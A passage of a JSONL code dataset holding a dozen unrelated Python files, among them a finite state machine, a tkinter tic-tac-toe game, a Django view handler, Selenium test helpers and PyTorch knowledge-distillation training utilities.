transition with the given name a source state to a target\n state that is only valid given the provided condition.\n \"\"\"\n\n self.source = source\n self.target = target\n self.condition = condition\n\n def is_valid(self, data):\n \"\"\"\n Check if this transition should occur for the given input data using\n the stored condition.\n \"\"\"\n\n # evaluate the condition\n return self.condition(data)\n\n def __repr__(self):\n \"\"\"\n Get the string representation of the transition.\n \"\"\"\n\n return \"\".format(\n self.source,\n self.target)\n\n\nclass StateMachine:\n \"\"\"\n A finite state machine.\n \"\"\"\n\n def __init__(self, states, initial_state, transitions):\n \"\"\"\n Create a finite state machine with the given states, initial state,\n and state transitions.\n \"\"\"\n\n # create a set of valid and transition states\n valid_states = set(states)\n transition_states = set(itertools.chain.from_iterable(\n [[t.source, t.target] for t in transitions]))\n\n # verify the initial state is valid\n if initial_state not in valid_states:\n raise ValueError(\"invalid initial state: {0}\".format(\n initial_state))\n\n # verify all transitions reference valid states\n if not transition_states.issubset(valid_states):\n raise ValueError(\"invalid transition states: {0}\".format(\n \", \".join(valid_states - transition_states)))\n\n # store the states and their transitions\n self.states = {\n state: [t for t in transitions if state == t.source]\n for state in valid_states}\n\n # initialize the current state\n self.current_state = initial_state\n\n @property\n def end_states(self):\n \"\"\"\n Get a list of states with no 
outgoing transitions.\n        \"\"\"\n\n        return [s for s in self.states if not self.states[s]]\n\n    def process_input(self, data):\n        \"\"\"\n        Process the input data to change the current state. All the transitions\n        available from the current state are checked for validity and the valid\n        one is processed. If there are zero or multiple valid transitions,\n        an error is raised.\n        \"\"\"\n\n        # determine valid transitions from this state\n        valid_transitions = [\n            t for t in self.states[self.current_state]\n            if t.is_valid(data)]\n\n        # corner case: no valid transitions\n        if not valid_transitions:\n            raise RuntimeError(\"no valid transitions\")\n\n        # corner case: more than one valid transition\n        if len(valid_transitions) > 1:\n            raise RuntimeError(\"multiple valid transitions\")\n\n        # execute the transition\n        transition = valid_transitions.pop()\n        self.current_state = transition.target\n","sub_path":"Core/cse3341/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"541558045","text":"#The following program converts degrees Celsius into degrees Fahrenheit.\n#In case you don't know, they are both measures of temperature.\n#The relation between Celsius and Fahrenheit is given by:\n#Degree_Fahrenheit=(9/5*Degree_Celsius)+32\n#Now let's calculate the following.\n#NOTE: Here we are using formatting to control the way we output the temperature.\n#Syntax for formatting a floating point number (up to x digits after the decimal):\n#print(format(number, '.xf'))\n\nCelsius=float(input('Enter temperature in celsius'))\nfahrenheit=9/5*Celsius+32\nprint(\"Degree in fahrenheit is\",format(fahrenheit,'.1f'))\n\n#OUTPUT:\n#>>> Enter temperature in celsius37.8\n#Degree in fahrenheit is 100.0\n","sub_path":"2.Data and expressions/2.Celsius_to_Fahrenheit.py","file_name":"2.Celsius_to_Fahrenheit.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"243751560","text":"import time, os, sys\nfrom msvcrt import getch\n\n\ndef clrscr(wait=True):\n    if wait is True:\n        time.sleep(0.5)\n    print('Для продолжения нажмите любую кнопку...')\n    if ord(getch()) > 0:\n        os.system('cls')\n\n\ndef println(lines):\n    if type(lines) == tuple:\n        for line in lines:\n            for ch in line:\n                time.sleep(0.03)\n                sys.stdout.write(ch)\n                sys.stdout.flush()\n            time.sleep(0.1)\n            print(' ')\n    else:\n        for ch in lines:\n            time.sleep(0.03)\n            sys.stdout.write(ch)\n            sys.stdout.flush()\n        time.sleep(0.1)\n        print(' ')\n\n\ndef printc(commands):\n    for key in commands:\n        print(str(key) + ') ' + commands[key])\n    while True:\n        try:\n            command = int(input('>>>'))\n        except ValueError:\n            command = 0\n\n        if command in commands.keys():\n            break\n        else:\n            println('Недопустимый ввод')\n    println('[' + str(commands[command]) + ']')\n    return command\n","sub_path":"game/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"624231203","text":"import pandas as pd\r\n\r\n# courses_path = \"C:/Users/TK/Desktop/WCC Dashboard/Courses.xlsx\"\r\ncourses_path = \"/Users/mengyaohuang/Documents/Michigan/WCC Dashboard project/Dataset/Courses.xlsx\"\r\nCourses_data = pd.read_excel(courses_path)\r\n\r\n# summary overall college level data\r\nCourses_data['SuccessPIDM'] = Courses_data['CountOfPIDM'] * Courses_data['Succ']\r\navailable_semester_options = ['Fall', 'Sp/Su', 
'Winter']\r\ncompleted_academic_year = list(Courses_data['AcadYr'].unique())","sub_path":"Dashboard/Dashboard DBC/courses_data_processing.py","file_name":"courses_data_processing.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246819205","text":"# -*- coding: utf-8 -*-\n\"\"\"Manage user sessions\n\n:copyright: Copyright (c) 2022 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom pykern.pkdebug import pkdp, pkdlog, pkdexc\nfrom pykern.pkcollections import PKDict\nimport contextlib\nimport datetime\nimport sirepo.quest\nimport sirepo.srtime\nimport threading\n\n_REFRESH_SESSION = datetime.timedelta(seconds=5 * 60)\n\n_DB = PKDict()\n\n_initialized = None\n\n#: Lock for operations across Sirepo (server)\n_THREAD_LOCK = None\n\n\ndef init_module(want_flask):\n global _initialized, _cfg, _THREAD_LOCK\n if _initialized:\n return\n _THREAD_LOCK = threading.RLock() if want_flask else contextlib.nullcontext()\n _initialized = True\n\n\nasync def init_quest(qcall):\n async def _begin():\n try:\n (await qcall.call_api(\"beginSession\")).destroy()\n except Exception as e:\n pkdlog(\"error={} trying api_beginSession stack={}\", e, pkdexc())\n\n def _check():\n u = qcall.auth.logged_in_user(check_path=False)\n t = sirepo.srtime.utc_now()\n s = _DB.get(u)\n if s:\n if t - s.request_time < _REFRESH_SESSION:\n return False\n with _THREAD_LOCK:\n s.request_time = t\n else:\n s = PKDict(request_time=t)\n with _THREAD_LOCK:\n _DB[u] = s\n return True\n\n if qcall.sreq.method_is_post() and qcall.auth.is_logged_in() and _check():\n await _begin()\n","sub_path":"sirepo/spa_session.py","file_name":"spa_session.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"133624496","text":"from tkinter import *\nimport tkinter.messagebox as msg\n\nroot= Tk()\nroot.title('TIC-TAC-TOE---Raniyer')\n\ndigits = [1,2,3,4,5,6,7,8,9]\n\nmark = ''\ncount = 0\npanels = ['panel']*10\n\ndef win(panels, sign):\n\t\n\tif ((panels[1] == panels[2] == panels[3] == sign)\n\t\tor (panels[1] == panels[4] == panels[7] == sign)\n\t\tor (panels[2] == panels[5] == panels[8] == sign)\n\t\tor (panels[3] == panels[5] == panels[7] == sign)\n\t\tor (panels[3] == panels[6] == panels[9] == sign)\n\t\tor (panels[4] == panels[5] == panels[6] == sign)\n\t\tor (panels[7] == panels[8] == panels[9] == sign)):\n\t\tif (sign=='X'):\n\t\t\tmsg.showinfo(\"Result\", \"Player1 wins\")\n\t\t\troot.destroy()\n\t\tif(win(panels, sign) and sign=='O'):\n\t\t\tmsg.showinfo(\"Result\", \"Player2 wins\")\n\t\t\troot.destroy()\n\treturn\n\t\t\ndef checker(digit):\n\tglobal count, mark, digits\n\tif digit in digits:\n\t\tdigits.remove(digit)\n\t\tif count%2 == 0:\n\t\t\tmark = 'X'\n\t\telif count%2!=0: \n\t\t\tmark = 'O'\n\t\tpanels[digit] = mark\n\t\tif digit == 1:\n\t\t\tbutton1.config(text = mark)\n\t\telif digit == 2:\n\t\t\tbutton2.config(text = mark)\n\t\telif digit == 3:\n\t\t\tbutton3.config(text = mark)\n\t\telif digit == 4:\n\t\t\tbutton4.config(text = mark)\n\t\telif digit == 5:\n\t\t\tbutton5.config(text = mark)\n\t\telif digit == 6:\n\t\t\tbutton6.config(text = mark)\n\t\telif digit == 7:\n\t\t\tbutton7.config(text = mark)\n\t\telif digit == 8:\n\t\t\tbutton8.config(text = mark)\n\t\telif digit == 9:\n\t\t\tbutton9.config(text = mark)\n\t\t\n\t\tcount += 1\n\t\tsign = mark\n\t\twin(panels, sign)\n\tif (count 
> 8 and win(panels,'X')==False and win(panels,'O')==False):\n \tmsg.showinfo(\"Result\",\"Match Tied\")\n \troot.destroy()\n\treturn\n\nLabel(root, text = \"Player1 : X\", font = \"times 15\").grid(row = 0, column = 1)\nLabel(root, text = \"Player2 : O\", font = \"times 15\").grid(row = 0, column = 2)\nbutton1=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(1))\nbutton1.grid(row = 1, column = 1)\nbutton2=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(2))\nbutton2.grid(row = 1, column = 2)\nbutton3=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(3))\nbutton3.grid(row = 1, column = 3)\nbutton4=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(4))\nbutton4.grid(row = 2, column = 1)\nbutton5=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(5))\nbutton5.grid(row = 2, column = 2)\nbutton6=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(6))\nbutton6.grid(row = 2, column = 3)\nbutton7=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(7))\nbutton7.grid(row = 3, column = 1)\nbutton8=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(8))\nbutton8.grid(row = 3, column = 2)\nbutton9=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(9))\nbutton9.grid(row = 3, column = 3)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"205159480","text":"latent_dim = 4\noutput_dim = 16\ninput_size = 1024 # time steps\nnum_classes = 97\nnum_pitches = 128\nhidden_units = 256\nbatch_size = 16\nnormalize_factor = 9.\nepochs = 20\nsteps = int(32690 / batch_size)\nvalidation_steps = int(2081 / batch_size)\nearly_stopping = 5\npadding = \"same\"\n","sub_path":"members/amit/cond_vae_z/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"67085950","text":"from python.component.Component import Component\n\nclass ExpenseHeaderComponent(Component):\n selectors={\n \"logout_link\":\"xpath=//a[text()='Logout']\",\n \"help_link\":\"id=zenbox_link\",\n \"logged_user_name\":\"xpath=.//*[@class='email']\",\n \"overview_topnav_trial_time_text\": \"xpath=.//*[@id='expense_trial_time']/span\",\n \"overview_topnav_trial_time_toggle_upgrade\": \"xpath=.//*[@id='expense_trial_time']/a\",\n \"overview_topnav_trial_time_upgrade_button\": \"id=upgradeAccount\",\n }\n \n def click_on_logout_button (self):\n self.logger.info(\"Click on logout link.......\")\n self.click_link(\"logout_link\")\n return\n \n def get_logged_user(self):\n logged_user_name = self.get_text(\"logged_user_name\")\n return logged_user_name\n \n def click_on_help_link(self):\n self.logger.info(\"Click on help link.......\")\n self.click_link(\"help_link\")\n return self\n\n def click_link_upgrade_account_header_toolbar(self):\n self.logger.info(\">>> SELECT & CLICK LINK UPGRADE ACCOUNT HEADER TOOLBAR\")\n self.click_element(\"overview_topnav_trial_time_toggle_upgrade\")\n self.wait_until_element_is_visible(\"overview_topnav_trial_time_upgrade_button\")\n 
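# comment (added for clarity): the toggle opens a drop-down, so the upgrade button must be visible before it can be clicked\n        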
self.click_element(\"overview_topnav_trial_time_upgrade_button\")\n return self\n \n def expense_trial_time_should_be(self, trial_time_text):\n self.logger.info(\">>> VERIFY EXPENSE TIME TRIAL SHOW: \" + trial_time_text)\n self.element_should_contain(\"overview_topnav_trial_time_text\", trial_time_text)\n return self\n\n def get_trial_time(self):\n content = self.get_text(\"overview_topnav_trial_time_text\")\n trial_time = content.split(' ')[0]\n return trial_time\n \nclass ExpenseHomeHeaderComponent(Component):\n selectors={\n \"login_link\":\"xpath=//*[@id='subNav']//a[@href='/users/login']\",\n \"sign_up_link\":\"xpath=//*[@id='subNav']//a[contains(text(),'Sign Up')]\"\n }\n \n def click_on_link_login (self):\n self.logger.info(\"Click on login link.......\")\n self.click_link(\"login_link\")\n return self\n \n def click_on_link_sign_up (self):\n self.logger.info(\"Click on sign up link.......\")\n self.click_link(\"sign_up_link\")\n return self","sub_path":"expense-ui-robot-tests/PythonExpenseAutomationTest/python/component/pagepart/HeaderComponent.py","file_name":"HeaderComponent.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"337075203","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n# @Time : 2019/10/28\n# @Author : hopsonxw\n# @FileName: NCAreaManagement.py\n# @Software: PyCharm\n# @email :190135@lifeat.cn\nfrom DestroyerRobot.automation.util.XmlUtil import XmlUtil\nfrom DestroyerRobot.automation.util.ConfigUtil import Config\nfrom DestroyerRobot.automation.util.DateTimeUtil import TestDateTime\nfrom DestroyerRobot.automation.com.cn.base.BasePage import BasePage\nfrom DestroyerRobot.automation.util.SystemOsUtil import SystemOs\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NC_Tree.test_nc_tree import test_nctree_master\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NC_TreeKids.test_nctree_kids import test_nctree_kids\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NCLoing.NCLogin import NCLoing\nfrom DestroyerRobot.automation.util.RandomUtil import TestRamdom\nfrom DestroyerRobot.automation.util.MySqlDBUtil import MysqlDB\nimport traceback\nimport time\n\nclass NC_AreaManagement:\n def __init__(self,driver):\n \"\"\"\n 实现数据后,定位页面信息操作\n 登录页面,操作数据\n \"\"\"\n self.driver = driver\n\n def rootChildConfigPath(self):\n # 从主配置文件中获取子配置文件路径\n conf2 = Config(\"ConfigKIDs\")\n # 获取子文件路径\n confFile = conf2.get_configPath(\"new_cms_configs\")\n return confFile\n\n def childConfigXML(self, Pageskeyword, UIElementkeyword):\n confFile = self.rootChildConfigPath()\n config2 = Config(\"XMLFilePath\", confFile)\n filepath = config2.get_path_config(\"area_management\")\n filepath = SystemOs().sys_path(filepath)\n xmlspath = XmlUtil(filepath)\n # 获取XML中相关信息\n xmls = xmlspath.xml_parsing(Pageskeyword, UIElementkeyword)\n return xmls\n\n def childConfigImgPath(self):\n \"\"\"\n 获取图片路径,并新建以日期为基础的文件目录名 例如: img/2019-01-01/\n :return:\n \"\"\"\n confFile = self.rootChildConfigPath()\n config3 = Config(\"ImgPath\",confFile)\n img_path = config3.get_path_config(\"error_img\")\n data_path = TestDateTime().local_day()\n img_path = SystemOs().sys_path(img_path,data_path)\n SystemOs().mkdirs_file(img_path)\n return img_path\n\n def add_area(self):\n add_btn_bys,add_btn_values = self.childConfigXML('片区管理','新增')\n input_area_bys,input_area_values = self.childConfigXML('片区管理','输入片区名称')\n input_part_bys, input_part_values = self.childConfigXML('片区管理', '选择归属区域')\n select_part_bys, 
select_part_values = self.childConfigXML('片区管理', '归属区域下拉选项')\n select_province_bys, select_province_values = self.childConfigXML('片区管理', '关联省份')\n select_city_bys, select_city_values = self.childConfigXML('片区管理', '关联城市')\n select_county_bys, select_county_values = self.childConfigXML('片区管理', '关联区县')\n save_btn_bys,save_btn_values = self.childConfigXML('片区管理','保存')\n nc = NCLoing(self.driver)\n try:\n test_nctree_master(self.driver).get_link_config_center() # 点击配置中心\n test_nctree_master(self.driver).get_link_Basic_data() # 点击基础数据\n test_nctree_kids(self.driver).get_link_Area_management() # 点击片区管理\n nc.input_click(add_btn_bys,add_btn_values) # 点击新增片区\n radom_num = TestRamdom().RandomTestInt(500,0)\n area_name = 'xw_AutoTest_片区'+ str(radom_num)\n\n nc.Input_z(area_name,input_area_bys,input_area_values) # 输入片区名称\n nc.input_click(input_part_bys,input_part_values) # 点击展开归属区域下拉选项\n nc.input_click(select_part_bys,select_part_values) # 选择归属区域\n time.sleep(6)\n nc.input_click_z(select_province_bys, select_province_values) # 选择省份\n time.sleep(2)\n nc.input_click_o(select_city_bys, select_city_values) # 选择城市\n nc.input_click_t(select_county_bys, select_county_values) # 选择区县\n time.sleep(2)\n nc.input_click(save_btn_bys,save_btn_values) # 保存\n time.sleep(2)\n\n return area_name\n\n # # 连接测试数据库,获取最新创建的部门名称(获取的名称没有按顺序排列,放弃此方法)\n # my = MysqlDB()\n # my.getCursor(sqltable=\"easylife_commallot\")\n # sql = \"SELECT department_name FROM commallot_staff_department\"\n # department = my.queryOperation(sql)\n # print(department)\n # return department\n\n except Exception:\n img_path = self.childConfigImgPath()\n BasePage(self.driver).save_img(img_path, str(int(TestDateTime().time_stamp())))\n print(traceback.format_exc())\n","sub_path":"DestroyerRobot/DestroyerRobot/automation/com/cn/new_cms/servers/NC_testcase/NCAreaManagement.py","file_name":"NCAreaManagement.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"216274007","text":"from baserow.core.exceptions import UserNotInGroupError\nfrom baserow.core.utils import extract_allowed, set_allowed_attrs\nfrom baserow.contrib.database.fields.models import Field\n\nfrom .exceptions import ViewDoesNotExist, UnrelatedFieldError\nfrom .registries import view_type_registry\nfrom .models import View, GridViewFieldOptions\n\n\nclass ViewHandler:\n def get_view(self, user, view_id, view_model=None):\n \"\"\"\n Selects a view and checks if the user has access to that view. If everything\n is fine the view is returned.\n\n :param user: The user on whose behalf the view is requested.\n :type user: User\n :param view_id: The identifier of the view that must be returned.\n :type view_id: int\n :param view_model: If provided that models objects are used to select the\n view. 
This can for example be useful when you want to select a GridView or\n other child of the View model.\n :raises ViewDoesNotExist: When the view with the provided id does not exist.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :type view_model: View\n :return:\n \"\"\"\n\n if not view_model:\n view_model = View\n\n try:\n view = view_model.objects.select_related('table__database__group').get(\n pk=view_id\n )\n except View.DoesNotExist:\n raise ViewDoesNotExist(f'The view with id {view_id} does not exist.')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n return view\n\n def create_view(self, user, table, type_name, **kwargs):\n \"\"\"\n Creates a new view based on the provided type.\n\n :param user: The user on whose behalf the view is created.\n :type user: User\n :param table: The table that the view instance belongs to.\n :type table: Table\n :param type_name: The type name of the view.\n :type type_name: str\n :param kwargs: The fields that need to be set upon creation.\n :type kwargs: object\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :return: The created view instance.\n :rtype: View\n \"\"\"\n\n group = table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n # Figure out which model to use for the given view type.\n view_type = view_type_registry.get(type_name)\n model_class = view_type.model_class\n allowed_fields = ['name'] + view_type.allowed_fields\n view_values = extract_allowed(kwargs, allowed_fields)\n last_order = model_class.get_last_order(table)\n\n instance = model_class.objects.create(table=table, order=last_order,\n **view_values)\n\n return instance\n\n def update_view(self, user, view, **kwargs):\n \"\"\"\n Updates an existing view instance.\n\n :param user: The user on whose behalf the view is updated.\n :type user: User\n :param view: The view instance that needs to be updated.\n :type view: View\n :param kwargs: The fields that need to be updated.\n :type kwargs: object\n :raises ValueError: When the provided view not an instance of View.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :return: The updated view instance.\n :rtype: View\n \"\"\"\n\n if not isinstance(view, View):\n raise ValueError('The view is not an instance of View.')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n view_type = view_type_registry.get_by_model(view)\n allowed_fields = ['name'] + view_type.allowed_fields\n view = set_allowed_attrs(kwargs, allowed_fields, view)\n view.save()\n\n return view\n\n def delete_view(self, user, view):\n \"\"\"\n Deletes an existing view instance.\n\n :param user: The user on whose behalf the view is deleted.\n :type user: User\n :param view: The view instance that needs to be deleted.\n :type view: View\n :raises ViewDoesNotExist: When the view with the provided id does not exist.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n \"\"\"\n\n if not isinstance(view, View):\n raise ValueError('The view is not an instance of View')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n view.delete()\n\n def update_grid_view_field_options(self, grid_view, field_options, fields=None):\n \"\"\"\n Updates the field options with the provided values if the field id exists in\n the table 
related to the grid view.\n\n :param grid_view: The grid view for which the field options need to be updated.\n :type grid_view: Model\n :param field_options: A dict with the field ids as the key and a dict\n containing the values that need to be updated as value.\n :type field_options: dict\n :param fields: Optionally a list of fields can be provided so that they don't\n have to be fetched again.\n :type fields: None or list\n :raises UnrelatedFieldError: When the provided field id is not related to the\n provided view.\n \"\"\"\n\n if not fields:\n fields = Field.objects.filter(table=grid_view.table)\n\n allowed_field_ids = [field.id for field in fields]\n for field_id, options in field_options.items():\n if int(field_id) not in allowed_field_ids:\n raise UnrelatedFieldError(f'The field id {field_id} is not related to '\n f'the grid view.')\n GridViewFieldOptions.objects.update_or_create(\n grid_view=grid_view, field_id=field_id, defaults=options\n )\n","sub_path":"backend/src/baserow/contrib/database/views/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"533888099","text":"from torch import nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch\n\n\ndef test_model(model, test_loader, device):\n correct = 0\n total = 0\n ce_loss = 0\n with torch.no_grad():\n for imgs, labels in test_loader:\n\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n preds = model(imgs)\n _, answers = torch.max(preds.data, 1)\n\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n ce_loss += F.cross_entropy(preds, labels).item()\n ce_loss /= len(test_loader)\n accuracy = correct / total\n return ce_loss, accuracy\n\n\ndef train_hard_labels(model, train_loader, val_loader, num_epochs, lr, \n device, log=False):\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n val_acc = []\n for i in range(num_epochs):\n\n if log:\n print(\"Epoch {}\".format(i))\n\n running_loss = 0.0\n total = 0\n correct = 0\n\n for i_batch, (imgs, labels) in enumerate(train_loader):\n\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n pred = model(imgs)\n\n _, answers = torch.max(pred.data, 1)\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n loss = criterion(pred, labels)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n train_acc = correct/total\n ce_loss, acc = test_model(model, val_loader, device)\n\n val_acc.append(acc)\n\n if log:\n print(\"Train: accuracy: {:.3f}, CE: {:.3f}\".format(train_acc, running_loss/len(train_loader)))\n print(\"Validation: accuracy: {:.3f}, CE: {:.3f}\".format(acc, ce_loss))\n\n return val_acc\n\n\ndef distill_loss(distill_pred, soft_labels, labels, T, alpha):\n hard_loss = F.cross_entropy(distill_pred, labels)\n\n distill_probs = F.log_softmax(distill_pred/T, dim=1)\n soft_probs = F.log_softmax(soft_labels/T, dim=1)\n\n soft_loss = F.kl_div(distill_probs, soft_probs, reduction='batchmean')\n\n return alpha * soft_loss * (T**2) + (1 - alpha) * hard_loss\n\n\ndef train_soft_labels(distill_model, teacher_model, train_loader, val_loader, \n num_epochs, lr, T, alpha, device, log=False):\n \"\"\"\n distill_model - модель, которую обучаем\n teacher_model - модель, которая генерирует \"мягкие\" ответы\n T - температура\n alpha - коэфициент перед ошибкой:\n loss = alpha * soft_loss * (T**2) + (1 - alpha) * 
hard_loss\n \"\"\"\n\n optimizer = optim.Adam(distill_model.parameters(), lr=lr)\n\n val_acc = []\n for i in range(num_epochs):\n\n if log:\n print(\"Epoch {}\".format(i))\n\n total = 0\n correct = 0\n running_loss = 0.0\n for i_batch, (imgs, labels) in enumerate(train_loader):\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n distill_pred = distill_model(imgs)\n soft_labels = teacher_model(imgs).detach()\n\n loss = distill_loss(distill_pred, soft_labels, labels, T, alpha)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n _, answers = torch.max(distill_pred.data, 1)\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n train_acc = correct/total\n ce_loss, acc = test_model(distill_model, val_loader, device)\n\n val_acc.append(acc)\n\n if log:\n print(\"Train: accuracy: {:.3f}, CE: {:.3f}\".format(train_acc, running_loss/len(train_loader)))\n print(\"Validation: accuracy: {:.3f}, CE: {:.3f}\".format(acc, ce_loss))\n\n return val_acc\n","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"252213575","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\nimport logging\n\nfrom sparts.vservice import VService\n\n\n# Import a Skip exception class that works with both pytest and unittest2\ntry:\n from _pytest.runner import Skipped\n class Skip(Skipped, unittest.SkipTest):\n pass\n\nexcept ImportError:\n class Skip(unittest.SkipTest):\n pass\n\n\n# Base test case for all sparts jonx\nclass BaseSpartsTestCase(unittest.TestCase):\n def assertNotNone(self, o, msg=''):\n self.assertTrue(o is not None, msg)\n\n def assertEmpty(self, arr, msg=''):\n return self.assertEquals(len(arr), 0, msg)\n\n def assertNotEmpty(self, o, msg=''):\n self.assertTrue(len(o) > 0, msg)\n\n @classmethod\n def setUpClass(cls):\n cls.logger = logging.getLogger('sparts.%s' % cls.__name__)\n super(BaseSpartsTestCase, cls).setUpClass()\n\n def setUp(self):\n if not hasattr(unittest.TestCase, 'setUpClass'):\n cls = self.__class__\n if not hasattr(cls, '_unittest2_setup'):\n cls.setUpClass()\n cls._unittest2_setup = 0\n cls._unittest2_setup += 1\n\n def tearDown(self):\n if not hasattr(unittest.TestCase, 'tearDownClass'):\n cls = self.__class__\n if not hasattr(cls, '_unittest2_setup'):\n cls._unittest2_setup = 0\n else:\n cls._unittest2_setup -= 1\n if cls._unittest2_setup == 0:\n cls.tearDownClass()\n\n def assertContains(self, item, arr, msg=''):\n return self.assertIn(item, arr, msg)\n\n @property\n def mock(self, *args, **kwargs):\n try:\n import mock\n return mock\n except ImportError:\n raise Skip(\"the mock module is required to run this test\")\n\n\nclass ServiceTestCase(BaseSpartsTestCase):\n def getServiceClass(self):\n return VService\n\n def setUp(self):\n super(ServiceTestCase, self).setUp()\n\n TestService = self.getServiceClass()\n TestService.test = self\n\n ap = TestService._makeArgumentParser()\n ns = ap.parse_args(['--level', 'DEBUG'])\n self.service = TestService(ns)\n self.runloop = self.service.startBG()\n\n def tearDown(self):\n self.service.stop()\n self.runloop.join()\n super(ServiceTestCase, self).tearDown()\n\n\nclass MultiTaskTestCase(ServiceTestCase):\n TASKS = []\n\n def requireTask(self, task_name):\n self.assertNotNone(self.service)\n return self.service.requireTask(task_name)\n\n def getServiceClass(self):\n self.assertNotEmpty(self.TASKS)\n 
class TestService(VService):\n TASKS=self.TASKS\n return TestService\n\n def setUp(self):\n super(MultiTaskTestCase, self).setUp()\n for t in self.TASKS:\n self.service.requireTask(t.__name__)\n\n\nclass SingleTaskTestCase(MultiTaskTestCase):\n TASK = None\n\n @classmethod\n def setUpClass(cls):\n super(SingleTaskTestCase, cls).setUpClass()\n if cls.TASK:\n cls.TASKS = [cls.TASK]\n\n def setUp(self):\n self.assertNotNone(self.TASK)\n super(SingleTaskTestCase, self).setUp()\n self.task = self.service.requireTask(self.TASK.__name__)\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"103268155","text":"''' Create a program that reads any sentence and says whether it is a palindrome, ignoring the spaces. \r\nE.g. (phrases that read the same backwards and forwards):\r\napos a sopa\r\na sacada da casa\r\na torre da derrota\r\no lobo ama o bolo \r\nanotaram a data da maratona'''\r\nfrase = str(input('Digite uma frase : ')).strip().upper()\r\ndividir = frase.split()\r\njunto = ''.join(dividir)\r\ninverso = junto[::-1]\r\n'''inverso = ''\r\nfor letra in range(len(junto)-1 ,-1, -1):\r\n inverso += junto[letra]'''\r\nprint('O inverso de {} é {}'.format(junto, inverso))\r\nif inverso == junto:\r\n print('Temos um palíndromo!')\r\nelse:\r\n print('A frase digitada não é palíndromo')\r\n","sub_path":"desafio053.py","file_name":"desafio053.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
